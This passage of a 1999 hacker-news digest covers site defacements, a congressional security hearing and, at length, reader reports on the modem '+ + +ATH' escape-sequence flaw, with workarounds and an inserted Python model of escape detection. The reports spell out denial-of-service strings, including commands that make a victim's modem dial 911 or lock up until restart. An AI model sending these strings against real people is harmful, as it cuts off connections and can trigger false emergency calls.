detractors. He’s been criticized as a self-promoter, and his
for-profit security site idea flies in the face of computer
“purists” such as Linux coders who believe such information
should be free; or that only a non-profit organization can
really offer a “Good Housekeeping seal” for security
information.
“I’m not worried about commercializing my credibility,”
Cooper said. “[Someone] said I am doing all this for
self-promotion. Maybe that’s true. But I’d like to think that
what I’m promoting is helping people.”
@HWA
94.0 Thanks-CGI Defaced With Its Own Script
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 24th 1999
From HNN http://www.hackernews.com/
contributed by Code Kid
"The Coolest CGI Magician On The Net", has been
defaced with one of its own tricks. Thanks-CGI has
been a recent victim of poor security. If you have
purchased scripts from this service in the past you may
want to double check them to be sure you are not
vulnerable as well.
7am News
http://7am.com/cgi-bin/twires.cgi?1000_t99062202.htm
Hacked Site Alleges Media Conspiracy
Updated 7:35 am PDT, 24 June 1999
By Bruce Simpson
Although repaired and back online within just a few short hours, the
Thanks-CGI website appears to have been hit a second time by the
"Hackers In Paradise" group.
This time the group appear happy to have simply changed the scrolling
javascript banner at the bottom of the page to read "HiP Welcomes you to
THANKS-CGI.... We're trying to make your site more secure for the
world!"
The operator of the website has told 7am.com that they are currently testing
for holes in their CGI scripts. They have suggested that the security hole
may not be the fault of their scripts -- rather that it could have been a
"misconfiguration between cgi script and the server."
7am.com discovered the hack while researching another story on CGI
resources and contacted the site's operator by email immediately the
problem was noticed. However, the operator of the Thanks-CGI site has
suggested that because "the arrival of your e-mail was paced so closely with
the occurence [sic] of the hackage ... we have strong reason to believe
there might be a relationship between 7am.com and the hacker who hacked
our site."
7am.com denies the allegations.
Original Report
To plagiarize and modify just a little: "As ye shall live by the Net, so shall ye
die by the Net" -- at least that's the message "Hackers in Paradise" appear
to be trying to impart on the operator of the Thanks-CGI site.
Billing itself as "The Coolest CGI Magician On The Net", the Thanks-CGI
site appears to have been left with a large amount of egg on its face after
"Hackers in Paradise" seemingly exploited a security hole in one of the
scripts and hacked the site's front page.
"Yep another site selling cgi scripts with major security problems. CGI
programmers need to spend a little time testing the security aspect of
thier [sic] scripts before trying to make money with them" is the
embarrassing message that greeted visitors to the hacked site.
7am.com has attempted to contact the operators of the Thanks-CGI site for
comment but as yet they have not replied to our email.
In the meantime, those who have purchased scripts from the site may well
be advised to get a guarantee that the same hole which allowed hackers into
the thanks-CGI site is not present in the software they purchased.
@HWA
95.0 ToorCon Date Changes
~~~~~~~~~~~~~~~~~~~~~
June 24th 1999
From HNN http://www.hackernews.com/
contributed by skalore
The date of ToorCon has changed to September
3rd-4th, 1999. There will be no San Diego 2600 Meeting
due to ToorCon falling on that date. The expo has also
moved to the Price Center in The University of
California, San Diego.
HNN Cons Page
http://www.hackernews.com/cons/cons.html
96.0 Gov Vulnerable Due to Lack of Training
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 25th 1999
From HNN http://www.hackernews.com/
contributed by Fedb0y
The Technology Subcommittee of the House Committee
on Science heard expert testimony on Thursday claiming
that computer security training is desperately needed.
The experts stressed that most federal employees do
not take computer security seriously and that this is
one reason for the numerous successful attacks on
federal systems. Another reason that was given was the
low salaries for properly trained security personnel.
When good people are found or developed in house they
are usually lured away by the private sector.
San Jose Mercury News
http://www.sjmercury.com/breaking/docs/055607.htm
ABC News
http://abcnews.go.com/sections/tech/DailyNews/hackers_govt990624.html
USA Today
http://www.usatoday.com/life/cyber/tech/ctf465.htm
APB Online
http://www.apbonline.com/911/1999/06/24/hack0624_01.html
MSNBC
http://www.msnbc.com/news/283837.asp
US House Committee on Science
http://www.house.gov/science/welcome.htm
Congress May Ask for Regular Security Reports
At the above hearing Rep. Connie Morella (R-Md.)
mentioned that federal agencies should report the
status of their computer security to Congress on a
regular basis. She plans to include the requirement in
her revision of the Computer Security Act of 1987.
All three witnesses at the hearing agreed this was a
good idea.
Federal Computer Week
http://www.fcw.com:80/pubs/fcw/1999/0621/web-security-6-24-99.html
Additional Government Sites Defaced
While hearings were being held, additional government
sites were being defaced. This time it was Monmouth
Army Base and the Argonne National Labs library.
(mirrors provided by attrition)
HNN Cracked Pages Archive
http://www.hackernews.com/archive/crackarch.html
San Jose Mercury News;
Posted at 10:44 a.m. PDT Thursday, June 24, 1999
Government vulnerable to
hackers, experts warn
WASHINGTON (AP) -- Government web sites and computer
networks are increasingly vulnerable to ``cyber attacks'' because they
lack trained personnel and don't follow security plans, federal officials
warned a congressional committee today.
Few people have adequate training to defend government websites, and
those who do seldom work in government for long, three panelists told
the House Science Committee's subcommittee on technology.
The security agencies ``train people at government expense and the
private sector waves a bigger paycheck and takes them away,'' said
Keith Rhodes, technical director with the General Accounting Office.
In addition, government security experts often find their advice isn't
followed, said Raymond Kammer, director of the National Institutes for
Standards and Technology, which recommends security measures for
federal computers.
``It is imperative that federal agencies implement vigorous security
programs,'' Rhodes said.
Hacker attacks like the recent defacing of the Senate web site are well
documented, but information about attempts to access sensitive
intelligence information is ``very sketchy,'' said Michael Jacobs, a
deputy director of the National Security Agency.
Hackers are often nearly impossible to trace unless they boast of their
actions.
In the most common type of attack, hackers overwhelm web sites with
a flood of requests for information, causing the site to slow or shut
down. Hackers can also redirect visitors to a fake web site that
appears to be the official site, as happened earlier this month to the
Senate site.
``We are clearly seeing an escalation in both the destructive nature and
aggressive pace of these and other attacks,'' Jacobs said.
-=-
ABC;
Gov’t Server Hacker Warning
Expert Panel Says Web Sites Are Vulnerable
By David Ho
The Associated Press
W A S H I N G T O N, June 24 — Government web
sites and computer networks are increasingly
vulnerable to “cyber attacks” because they lack
trained personnel and don’t follow security
plans, federal officials warned a congressional
committee today.
Few people have adequate training to defend
government websites, and those who do seldom work in
government for long, three panelists told the House Science
Committee’s subcommittee on technology.
The security agencies “train people at government
expense and the private sector waves a bigger paycheck
and takes them away,” said Keith Rhodes, technical
director with the General Accounting Office.
No One Follows Advice
In addition, government security experts often find their
advice isn’t followed, said Raymond Kammer, director of
the National Institutes for Standards and Technology, which
recommends security measures for federal computers.
“It is imperative that federal agencies implement
vigorous security programs,” Rhodes said.
Hacker attacks like the recent defacing of the Senate
web site are well documented, but information about
attempts to access sensitive intelligence information is
“very sketchy,” said Michael Jacobs, a deputy director of
the National Security Agency.
No Crowing, No Leads
Hackers are often nearly impossible to trace unless they
boast of their actions.
In the most common type of attack, hackers overwhelm
web sites with a flood of requests for information, causing
the site to slow or shut down. Hackers can also redirect
visitors to a fake web site that appears to be the official
site, as happened earlier this month to the Senate site.
“We are clearly seeing an escalation in both the
destructive nature and aggressive pace of these and other
attacks,” Jacobs said.
-=-
Federal Computer Weekly;
House member suggests regular network security
reports
BY DIANE FRANK (diane_frank@fcw.com)
Federal agencies may soon be required to submit regular reports to Congress
on the security status of their networks, much as they now report their Year
2000 compliance.
At a House Technology Subcommittee meeting today covering reasons why
federal World Wide Web sites and systems are vulnerable to cyberattacks, Rep.
Connie Morella (R-Md.) said that in her revision of the Computer Security Act
of 1987 she plans to include a requirement for agencies to report to Congress
regularly the steps they are taking to secure their sites and systems.
All three witnesses at the hearing supported Morella's suggestion as a way to
spur agencies to move beyond planning security measures and into implementing
them. Testifying at the hearing were Keith Rhodes, director of the Office of
Computer and Information Technology Assessment at the Accounting and
Information Management Division of the General Accounting Office; Michael
Jacobs, deputy director of information systems security at the National Security
Agency; and National Institutes of Standards and Technology director Ray
Kammer.
"Security needs to stop being an afterthought," Rhodes said. "The value of
reporting would be in a standardization of agencies' ability to report," he said.
If agencies know the questions Congress will ask, they will better understand
the fundamental IT implementation steps they must take, he said.
Many agencies in the national security community already submit such reports
and have found it helpful to undergo regular security assessments, Jacobs said.
Rhodes, Jacobs and Kammer also suggested that the new computer security bill
require federal agencies to use security expertise developed by NIST and NSA
instead of "recommending" such steps, as the current act does.
@HWA
97.0 Teeside University Offers Degree in Warez
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 25th 1999
From HNN http://www.hackernews.com/
contributed by Warez Dude
The University of Teesside will soon offer a four year
degree in warez. Courses will obviously include
programming but also the history of warez, good game
design and other topics to prepare graduates for entry
into the booming computer game industry.
BBC
http://news.bbc.co.uk/hi/english/education/newsid_377000/377341.stm
Teesside University
http://www.tees.ac.uk/
BBC;
Education
Compulsory games for
students
The courses will prepare students for a career in the games industry
A university computer department is taking down notices
saying that it is forbidden to play games - and replacing
them with new signs saying that it is going to become
compulsory.
The University of Teesside is introducing a degree
course in designing computer games, which will mean
four years of playing and building games and writing
essays on such subjects as the history of computer
games.
For serious addicts of screen games, there is a course
unit dedicated to the appreciation of games, which will
involve comparing the relative merits of the latest
releases and classics such as Sonic the Hedgehog and
Super Mario.
Expanding market
The course tutor, Matthew Holton, says that the new
qualification, which will have links with games
companies, will provide graduates for the expanding jobs
market in the computer games industry.
"The course has been compiled with a great deal of
input from experts in the games industry so graduates
from these degrees may have no problem walking into
jobs," he said.
"People don't realise how large the computer games
industry has become - or that some of the best games are
developed in Britain."
The course has been
designed as practical training for a career in designing
computer games, with students spending their time
learning about how to make games and considering
which approaches produce the best results.
Serious endeavour
Mr Holton, who expects the course to attract serious
games enthusiasts, says that assessing students'
efforts will not be problematic.
"There are plenty of academic criteria that can be
applied to such a course, such as assessing the quality
of art work, lighting, animation, interaction and the user
interface."
The university is offering two degree courses for
computer games - one in the creative design for games
and the other in computer programming.
But even though the courses are dealing with games, a
university spokesman emphasised that these were not
"Mickey Mouse" subjects, but were serious vocational
courses serving a growing sector of the economy.
@HWA
98.0 FREE DefCon WebCasts
~~~~~~~~~~~~~~~~~~~~
June 25th 1999
From HNN http://www.hackernews.com/
contributed by angus
Yesterday HNN mentioned that HNC Network would be
providing a webcast of DefCon for $29.95. These sites
will also be broadcasting live audio and video streams of
selected speakers, interviews and video live from the
show floor. These feeds are FREE to the public.
Pirate Radio UK
http://www.pirate-radio.co.uk
Hacksec
http://www.hacksec.org
99.0 Old Modem Flaw Still Haunts Users
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 25th 1999
From HNN http://www.hackernews.com/
contributed by pbradely
Hayes, the old modem manufacturer, may not live any
longer but its legacy lives on. Hayes originally had the
patent on the escape sequence "+ + + ATH" (without
the spaces). It would appear that many modem
manufacturers are still not paying the royalties for TIES
(Time Independent Escape Sequence). As discovered
years ago this escape sequence will force many modems
to go offline or into command mode forcing a reboot. An
excellent DoS attack. MacInTouch has an interesting
new report on this OS independent problem. If you find
that you are susceptible to this ancient flaw you can
try changing the value of the S2 register to something
greater than 127. (Consult your modem manual on how
to do this.)
Macintouch Report
http://www.macintouch.com/modemsecurity.html
BugTraq Archive Sept 1998
http://geek-girl.com/bugtraq/1998_3/0916.html
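To see why the S2 workaround above actually works, and why a modem that honours the classic Hayes guard time is not fooled by an escape sequence buried inside a packet, here is a small model of a modem's escape-sequence detector. This is an added example, not code from MacInTouch, HNN, Hayes or any modem vendor: the register meanings (S2 = escape character code, S12 = guard time in 1/50 s) follow the usual Hayes convention, the TIES behaviour is modelled only from the description given on this page, and the traffic samples are constructed for the demonstration.

```python
"""Toy model of how a modem decides that three escape characters in the
data stream mean 'drop to command mode'.  Constructed example; register
semantics follow the Hayes convention (S2 = escape character, S12 = guard
time), the TIES behaviour is modelled from the page's description."""

from dataclasses import dataclass
from typing import List, Optional, Tuple

Event = Tuple[int, str]          # (arrival time in ms, character)

# Spelled out rather than typed literally, for the same reason the page
# puts spaces between the plus signs in its examples.
ESC3 = "+" * 3


def make_stream(segments: List[Tuple[int, str]]) -> List[Event]:
    """Build a timed character stream from (pause_before_ms, text) pairs.
    Characters inside one text arrive 1 ms apart."""
    events, t = [], 0
    for pause, text in segments:
        t += pause
        for ch in text:
            events.append((t, ch))
            t += 1
    return events


def _read_at_command(events: List[Event], start: int) -> Optional[str]:
    """Return the AT command starting at events[start] ('AT' ... '\r'),
    or None if what follows is not a complete AT command."""
    chars = []
    for _, ch in events[start:]:
        if ch == "\r":
            cmd = "".join(chars).upper()
            return cmd if cmd.startswith("AT") else None
        chars.append(ch)
    return None


@dataclass
class ModemEscapeDetector:
    s2: int = 43        # escape character code; '+' is 43, values above 127 disable recognition
    s12: int = 50       # guard time in 1/50 s units; 50 = one second
    ties: bool = False  # True models a Time Independent Escape Sequence modem

    def escape(self, events: List[Event]) -> Optional[str]:
        """Scan a connect-mode data stream.  Returns None if the modem stays
        online, otherwise the AT command it would execute after escaping
        ('' if it escaped but no command has arrived yet)."""
        if self.s2 > 127:
            return None                  # the page's workaround: S2 > 127 turns the escape off
        esc = chr(self.s2)
        guard_ms = self.s12 * 20
        n = len(events)
        for i in range(n - 2):
            if any(events[i + k][1] != esc for k in range(3)):
                continue
            if events[i + 2][0] - events[i][0] > guard_ms:
                continue                 # the three characters must arrive close together
            if self.ties:
                cmd = _read_at_command(events, i + 3)
                if cmd is not None:      # TIES: '+++' glued to an AT command is enough, no silence needed
                    return cmd
                continue
            quiet_before = i == 0 or events[i][0] - events[i - 1][0] >= guard_ms
            quiet_after = i + 3 == n or events[i + 3][0] - events[i + 2][0] >= guard_ms
            if quiet_before and quiet_after:   # Hayes: silence on both sides of '+++'
                return _read_at_command(events, i + 3) or ""
        return None


# Constructed traffic samples.
# 1. The scenario on the page: an echoed payload carries the escape sequence
#    and a hang-up command inline, with no pause around them.
INLINE_PAYLOAD = make_stream([(0, "ping reply payload: "), (0, ESC3 + "ATH0\r"), (0, " trailing bytes")])
# 2. A host that genuinely wants command mode: silence on both sides, then the command.
HOST_ESCAPE = make_stream([(0, "file transfer in progress"), (1500, ESC3), (1500, "ATH0\r")])
# 3. Ordinary data that happens to contain three plus signs.
HARMLESS = make_stream([(0, "x = a" + ESC3 + " b; // C source")])


def classify(events: List[Event]) -> dict:
    """Run one stream through three modem configurations."""
    return {
        "hayes_guard_time": ModemEscapeDetector().escape(events),
        "ties": ModemEscapeDetector(ties=True).escape(events),
        "ties_s2_disabled": ModemEscapeDetector(ties=True, s2=255).escape(events),
    }


if __name__ == "__main__":
    for name, ev in [("inline payload", INLINE_PAYLOAD), ("host escape", HOST_ESCAPE), ("harmless", HARMLESS)]:
        print(name, classify(ev))
```

Running it shows the three cases side by side: the guard-time modem ignores the inline payload because there is no silence around the plus signs, the TIES modem would execute ATH0 from the same bytes, and the TIES modem with S2 set to 255 ignores it entirely. The real host-initiated escape still works on the first two, which is why raising S2 is a trade-off (the host loses the ability to escape with the sequence too) rather than a free fix.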
Macintouch;
Modem Guard Mode/Security Defect
1.Problem Description
2.Workarounds
3.Background Info
Important note:
The incredible modem defect described below makes it impossible for many people to even view
certain character sequences without triggering the bug.
As a result we have been forced to change the modem command strings in all the examples below,
inserting spaces between the plus signs. The actual command strings have no spaces or quotes.
Problem Description
Date: Sun, 20 Jun 1999 15:01:47 -0400
From: "Mohammad A. Haque"
Subject: Global Village modem exploit?
Apparently there seems to be a problem with Global Village modems where you can cause it to execute modem commands remotely. If you
send a computer an AT command in a packet that another remote machine responds to (i.e. ctcp, ping, icmp) the modem on that machine
does that command.
For example, while on irc if I sent the command /ctcp SomeOne ping + + +ATH0, SomeOne's machine would respond to the ping and as
a result his/her modem would hang up right after that. It just doesn't stop there. Imagine sending out /ctcp SomeOne ping + + + +
ATH0ATADT911.
Is this a known problem with Global Village modems?
Mohammad A. Haque
Subject: new denial of service attack?
Date: Mon, 21 Jun 1999
From: [MacInTouch reader]
Hi there!
I was playing around this weekend and found what appears to be a denial of service attack which works with dreadful effectiveness on
iMacs and pretty much any other Mac with certain Global Village modems. It was essentially pointed out to me by a couple of kid phreakers,
and at first I dismissed it until I watched them repeatedly knock a couple of iMac and other GV users off the net.
Hopefully, you guys know all about this stuff, and there was a bug fix released that neither I nor my guinea pig tester could find. But just in
case you don't...
Modem? Yes, this attack seems to exploit a firmware issue. Apparently, the Global Village modem in the iMac as well as a few other
external modems are susceptible. I don't have the resources to test different modems, but I suspect that the problem is going to be found in
every GV with the same chipset.
Symptom: Immediate hangup/disconnection upon receiving the signal.
Technical description of the setup:
Modems have two modes- command mode, where they will process commands issued to them, and connect mode, where they simply pass
data. When you dial another modem and a connection is made, the modem switches to connect mode by default. When you wish to hang up,
a signal is sent which forces the modem into command mode so that it can interpret commands, and then processes the hangup command as
issued from the computer.
The process for switching a modem from connect mode to command mode is simple- there must be silence on the connection for a specified
amount of time, followed by the + (plus) symbol repeated 3 times (+ + +) followed by an equal silent pause. The pause is known as "Guard
Time," to ensure that your modem doesn't accidentally hang up whenever it encounters the string "+ + +" in regular communications.
Additionally, most modems can only accept the command mode string when it comes from the DTE (serial side) of the connection rather
than the remote side.
Although I've yet to confirm it, it would appear that the affected modems have their guard time duration value set to zero- meaning that the
string should throw their modems into command mode without any silence on the line before or after the switch string.
The exploit:
In simplest terms, if I can send something to a computer connected by one of these modems which will be repeated back byte for byte,
there's a fair chance that the command mode string (+ + +) will not be broken up by the characters encapsulating it within a packet (if on a
PPP connection). I don't fully understand PPP encapsulation; I would think that that alone would be enough to protect against this sort of
attack... but I've seen that it isn't.
Add it up:
If I had a super carefully constructed ICMP message, maybe a web page with a hidden form, or a malformed client to client protocol
message in an IRC session which contains '+ + +ATH0,' and some software protocol in your mac bounces it back to me.... and I can have
your Mac send + + +ATH0 to its modem... the ATH0 is of course the Hayes AT command to hang up immediately. I won't even address
the possibility that such a request could be used to totally alter the modem's configuration in its onboard NVRAM, which would wreak further
havoc.
Defense?
My first reaction would be to check the value of whatever is in the S12 register of the modem. This can be checked by feeding "AT&V" into
zterm or another terminal emulator when the modem is in command mode.
I haven't been able to find a tester who's got an affected modem *and* a working knowledge of Zterm or any other terminal emulator, so I'm
really hung up on this one- no pun intended. I am expecting to find the value set to 0.
Changing this value should eliminate the problem- it will introduce guard time to the string that the modem expects to receive. Because of the
nature of PPP encapsulation, the modem would never receive the command-mode string until it was legitimately sent from the PPP driver
itself at the end of the session.
In english, adding something like, "S12=50" to your modem init string should fix it. I can't remember what the default guard time is supposed
to be, and I've switched to a DSL connection- no modems handy.
One possible side effect of this fix is that if the guard time is set too high, the modem will ignore legitimate hangup requests from the PPP
program.
... So far I've just seen some kids using this attack on IRC servers... they broadcast it across entire channels and see who drops off. ...
From: flowerpt
Date: Mon, 21 Jun 1999 10:15:02 -0400
Subject: "modem security flaw"
This isn't a new problem. When I was working tech support back in '94 a few modem manufacturers were doing this, what they called TIES
(Time Independent Escape Sequence). They basically skipped the guard time.
Back then, it was to avoid paying royalties to Hayes, who long ago realized the guard time was essential for reliable communications. I
suppose they have a patent on it.
Some jolly folks on usenet had "do you need a new modem? + + +ATH" in their .sig. When people used terminal connections...
I don't remember the exact figure, but when we calculated the odds of it occurring randomly, it was about once per gigabyte. At the time, that
seemed huge. Now, it seems likely to occur to a good number of people each day.
Hopefully, this is all just a bad INIT string.
-Bill
Date: Mon, 21 Jun 1999 09:10:10 -0600
Subject: Modem Security Problem...
From: "Darron Froese"
Ric,
This is nothing new at all. Many modems on many different computers (on many different operating systems) are at risk here. Some estimate
10%-20% while others estimate it's closer to 30%-50%.
Take a look at the bugtraq archives for more detailed info:
1998_3/0916.html
You can follow the thread from there...
--
Darron
Subject: TIES modems and the escape sequence guard time
Date: Mon, 21 Jun 1999 11:16:29 -0400
From: Bill Coleman AA4LR
... Hayes did, indeed, have a patent on this technology, and they stringently defended it. Since the demise of Hayes, it is unclear who now
owns this patent.
As for the occurrence of this problem, when I was at Hayes and the TIES modems surfaced, Hayes initiated a protracted search for
documents which ended in + + +ATH. (The carriage return is required) The search proved fruitless.
However, Hayes started ending all of their press releases and other documents with + + +ATH. This practice continued right up until
the liquidation of Hayes earlier this year. ...
Bill Coleman, AA4LR, PP-ASEL Mail: aa4lr@radio.org
Date: 21 Jun 99 09:04:11 PDT
From: David Anderson
Subject: Modem Security Flaw
Hey Ric,
As you may know Global Village did not build the modems for the iMac, late model Wallstreets/Lombard or B&Ws. We did build some
modems for the early Wallstreets and G3 beige boxes.
QA is looking at the subject of remote denial of access as we speak and if we find anything with our modems we will post it on the web site.
Subject: iMac modem security flaw -- documentation suggests otherwise
Date: Mon, 21 Jun 1999 15:16:45 -0400
From: Josh Brannon
I have an iMac and have not yet had an opportunity to test the modem security issue you documented today (6/21/99), but with the iMac
came a document called "AT Commands.pdf" that documents the AT Commands for the "Apple Internal Modem" (whatever that means --
iMac is never explicitly stated), and in it it states clearly,
"In order to prevent the modem from responding to '+ + +' (called the 'escape sequence') it requires a one second pause before
and after the sequence. Without the pause, the modem treats the '+ + +' sequence as data rather than a command."
This seems to be at odds with the reports that users are giving, and if nothing else suggests that the security issue documented is not how
Apple intended the modem to work.
Josh Brannon
Date: Mon, 21 Jun 1999 19:25:21 -0400
From: Jack Rodgers
Subject: GV Modems and A T H
After reading the comments on send + + + A T H to some modems, I tried to send myself an email with the subject and body being "+ + + A
T H" minus the quotes and spaces. The sending disrupted the modem and seemed to cause a cycling on and off. This is on a new B&W 400
Mhz G3 and a newly installed GV Teleport Internal 56K modem and Eudora Pro 4.2 beta.
So, who's at fault? The GV Modem, Eudora....
Jack Rodgers
Subject: Modem Security Flaw
Date: Mon, 21 Jun 1999 11:57:07 -0700
From: Travis Beals
In response to one of the emails posted in the discussion about the Modem Security Flaw, I did a quick check on my Rev. A iMac's modem.
Using Microphone LT, I used the AT&V command to check the value of the S12 register, and found that it defaults to 50, not 0, as some had
supposed. Other than installing the standard Apple modem firmware updates, I have made no modification to my modem's settings. I also
checked the iMac 56K modem script to make sure it does not set S12 to 0 (it doesn't).
Although I have not (to my knowledge) experienced the modem DoS (denial of service) attack, I do not know whether my modem is
immune. If the guard time of 50ms specified in S12 is correctly implemented, there SHOULD be no problem.
-Travis
Subject: Modem Security Flaw
Date: Mon, 21 Jun 1999 23:18:40 -0500
From: Marcus Aanerud
I just wanted to confirm the modem security flaw with a Global Village 56K modem (Upgraded to V.90). As an experiment, I sent an e-mail
with the escape code at the end of it, including the carriage return, and it promptly kicked me offline, just as it was supposed to be done
sending the message.
Heh... whoops!
Marcus Aanerud
Subject: Re: Modem Security Flaw
Date: Mon, 21 Jun 1999 10:52:43 -0500
From: Jonathan 'Wolf' Rentzsch
Greetings!
... About "Modem Security Flaw". Assuming you can execute arbitrary modem commands remotely, here's a great command: "+ +
+ATS3=128".
This takes the modem offline ("+ + +"), and sets the first newline character to decimal 128 ("S3=128"). It turns out the modem uses newline
character to determine when a command has been completed and executed. Usually this value is set to 13, which is the ASCII code for
"return".
However, modems will strip the high bit of incoming ASCII characters in command mode. This act makes it impossible to send characters
through to the modem whose value is greater than decimal 127.
You've just made it impossible to execute *any* commands sent to the modem. On external modems, you need to cycle the modem's power
switch to get your modem back.
On a computer with an internal modem (iMac, B&W G3), you need to restart!
-- Jonathan 'Wolf' Rentzsch
Date: Tue, 22 Jun 1999 10:49:42 -0400
From: Aaron Bratcher
Subject: Modem Security Flaw
I purchased an Apple G3 Internal modem after purchasing my blue/white G3 Tower. Someone on the IRC showed me how they could
control my modem using the /ctcp command that was described by another reader. (btw: I cannot even put that command into this e-mail
message because I am dialed up and it causes a disconnect when I send it)
Unfortunately, it is not because of the S12 register contents. After reading about that possibility, I downloaded ZTerm to check and found
that my S12 register was set to 50.
As a further check, I modified my modem script to set the S12 register to 50 just before dialing in. This too had no effect.
Apparently this is a bigger bug than simply an init string. This shows that there are problems in the firmware.
-- Aaron Bratcher
Date: Wed, 23 Jun 1999 01:38:25 -0500
From: pasupati
Subject: modem hangups
This hangup problem affects motorola modemsurfer 56k modem upgraded to V90... I set S12=50 and it doesn't correct the problem. Motorola
is out of the modem business so there is no help on their site.
Date: Tue, 22 Jun 1999 22:49:30 -0700
From: filmman
Subject: Modem Security Flaw
I've confirmed the security flaw with my Global Village 56K external modem (upgraded to v.90). I sent myself an email with the "+ + + A T
H " command (minus the quotes and spaces) followed by a carriage return, and I was immediately knocked offline as the message was sent.
Using zterm, I used "AT&V" to check the S12 register, and it is 050. So apparently, the guard time of 50ms doesn't prevent the modem from
being disconnected. Either that, or it's not being implemented for some reason.
Interestingly, while I was reading your reader reports on the security flaw, I was knocked offline!
Laz
Date: Tue, 22 Jun 1999 20:06:26 -0400
From: Scott Lahteine
Subject: Modem Security Flaw
Re the modem security flaw: I had a problem months ago where a friend had sent the + + + A T H inside an email, and for a week I thought
my ISP was hanging up on me! I finally tracked it down to the code in the email, and promptly cringed. My modem is a SupraExpress 56K
external, and I'd guess that many other modems are afflicted.
Scott Lahteine
Date: Wed, 23 Jun 99 12:36:12 CST
Subject: Modem Flaw
From: (JOSH BARTON)
I tried to look at the page regarding modem flaws. I kept getting disconnected while trying to view the page. I found that most odd. Every
time it started to load my modem would disconnect. As it turns out, all of the examples on the page were tripping the modem just as the flaw
said. I am using a Global Village Speakerphone 33.6.
I worked around it by dialing into my ARA server and using MACIP to tunnel the IP stuff into my appletalk protocol.
I found it interesting that something just posting in the html would be able to disconnect the modem. This leaves the door open for a hacker to
put hidden code into a web page that could permanently disable a global village modem by disrupting its ROM image.
Josh Barton
Date: Thu, 24 Jun 1999 05:58:19 +1000
From: David Monroe
Subject: KILLING MY MODEM
I don't know what you had on the modem report page - I tried several times to read it but my express modem disconnected and PPP froze
up. No problems elsewhere - just on this link.
David Monroe
Boda Farm BELLTHORPE 4514 Australia
Date: Wed, 23 Jun 1999 18:07:13 -0500
From: Matt
Subject: Modem Flaw
Well it appears the flaw is not limited to just GV modems. I have a BestData 56k Speakerphone modem connected to a SuperMac S900, and
emailed myself the + + + A T H command in the subject and the body and was kicked offline immediately.
"Widespread problem" could be an understatement with something so simple able to kick so many people.
Many thanks to MacInTouch for making us aware of this and providing workarounds for it.
Matt Perkins
Michigan USA
Date: Wed, 23 Jun 1999 18:18:45 -0700
From: John W Baxter
Subject: Modem escape sequence note (ongoing discussion)
Some readers have mentioned that S12 does contain 50 on certain modems. Others have mentioned that the same modems have the escape
sequence A T H flaw. And one reader set S12 to 50 and found that doing so didn't help.
None of this is surprising: a modem may very well implement S12 and let it hold values without using the register for anything. On a modem
with the usual implementation of the guard time for the + + + escape sequence, S12 contains the time. On modems which don't implement the
guard time, S12 holds a number unrelated to the escape sequence--and probably unrelated to anything else.
--John
Date: Wed, 23 Jun 1999 23:03:04 -0400
From: Carl Foner
Subject: Help
First off, I love MacInTouch. It's about as much a daily ritual as brushing my teeth.
I read with interest the note about modem problems. I clicked on the link to read the story, it started loading, but then my ppp connection
dropped. I thought it was odd, so I tried it again. Same problem. It happened another 10 or so times, before I tried going through several
diagnostics, checking settings, cables, etc.
After no luck I went back online and tried looking at some other stuff. No problem. I went around for 10 or 20 minutes and things were fine.
Then, I went back to the modem problems story. In about 10 seconds my connection dropped. I tried a couple more times and got the same
response.
I'm sure you'll agree that my modem having trouble getting to a story about modem trouble is more than a little ironic.
Any thoughts?
Thanks,
Carl Foner
Date: Wed, 23 Jun 1999 17:19:44 -0500
Subject: "modem flaw"
From: "Robert Westerman"
Whenever I click on the link for "modem flaw" it drops my connection and I can never make it to the article.
This really is a modem flaw.
Is it me or is it memorex???
Thank you,
Robert Westerman
Date: Thu, 24 Jun 1999 23:46:53 +0100
Subject: Macintosh Modem Woes
From: "John Gibbs"
Ric,
Just on a whim I tried sending the "+++" "ATH" commands to myself, via email... As you can see from the way I wrote them, they caused
my modem to hang up immediately. The odd thing is, my modem is a generic V.90 modem for the PC. The brand itself is DCS or some such,
I picked it up at a local computer (read PC) fair here in London. I guess it uses the same chipset as Apple's/GV's (I believe my unit uses a
Rockwell chipset).. It would seem that this bug affects a good number of modems.
However, the good news is that Massimo Valle's tip works great even on el-cheapo no-name modems like mine.. I think I speak for
everyone when I give a whole-hearted THANKS! to Massimo.
Regards,
-John
London, UK
Date: Thu, 24 Jun 1999 11:36:50 -0400
From: Yann
Subject: Modem flaw on SupraExpress 56k too
Hi!
The string "+ + + A T H", without the spaces, when sent in the subject line of an e-mail message, with Eudora Light, disconnected my
Diamond Multimedia SupraExpress 56k V.90 immediately.
Adding S2=127 to the init string fixes it.
Apple and Diamond need to release fixed ARA scripts for this ASAP.
- Yann Duguay
Date: Thu, 24 Jun 1999 23:12:55 -0400
From: Richard Outerbridge
Subject: modem flaw weaselling
1999-06-24 22:57:46 EDT
The devil is in the details... the Apple pdf file describing modem commands ("AT Commands for the Apple
Internal Modem") only promises that the S12 register will control the modem's response to the escape sequence. Quote:
S12 register (Guard time)
.... If any characters are detected during this time, the OK will not be sent. Note that sending of the OK result code
does not affect entry into command mode.
In other words, my modem, which exhibits the DOS vulnerability, is behaving exactly according to its specifications: the value in S12 only
determines whether or not the modem sends back OK in response to the escape sequence, NOT whether or not it enters command mode in
response to the escape sequence. I detect the presence of patent lawyers... class-action lawsuit, anyone?
And yes, adding "S2=128" to all my init strings seems to be an effective workaround for my purposes.
outer
Date: Thu, 24 Jun 1999 22:42:42 -0500
From: Brian Alletto
Subject: modem security flaw
Add the Zoom 56K Dualmode modem, model 2945 to your list of modems affected by the security flaw.
Brian Alletto balletto@sprintmail.com
Date: Thu, 24 Jun 1999 19:46:50 -0700
From: Joe
Subject: Modem Security Flaw & Viking Modems
Hi Guys,
Guess what? My new Viking External v.90 modem has the bug. I could not send email to myself with the subject : + + + A T H....Got
knocked off immediately, but had no problem sending the escape command in the body of the message.
I'm calling Viking right now and digging out the ole trusty Hayes Optima 33.6
Thanks for the tip.......Keep up the good work.
Joe
Workarounds
Date: Mon, 21 Jun 1999 14:26:26 -0400
Subject: iMac escape code
From: "Chris Dembitz"
For iMac users using Ircle (an irc client) the excellent freeware irc script package Hipscript will protect against any /ctcp-based DoS
attack that uses the + + + code, in addition to providing many other useful features. I personally tested this with an iMac today, and it worked
flawlessly.
Chris
From: Richard Smith
Subject: Modem Security Flaw
Date: Wed, 23 Jun 1999 13:28:18 +1200
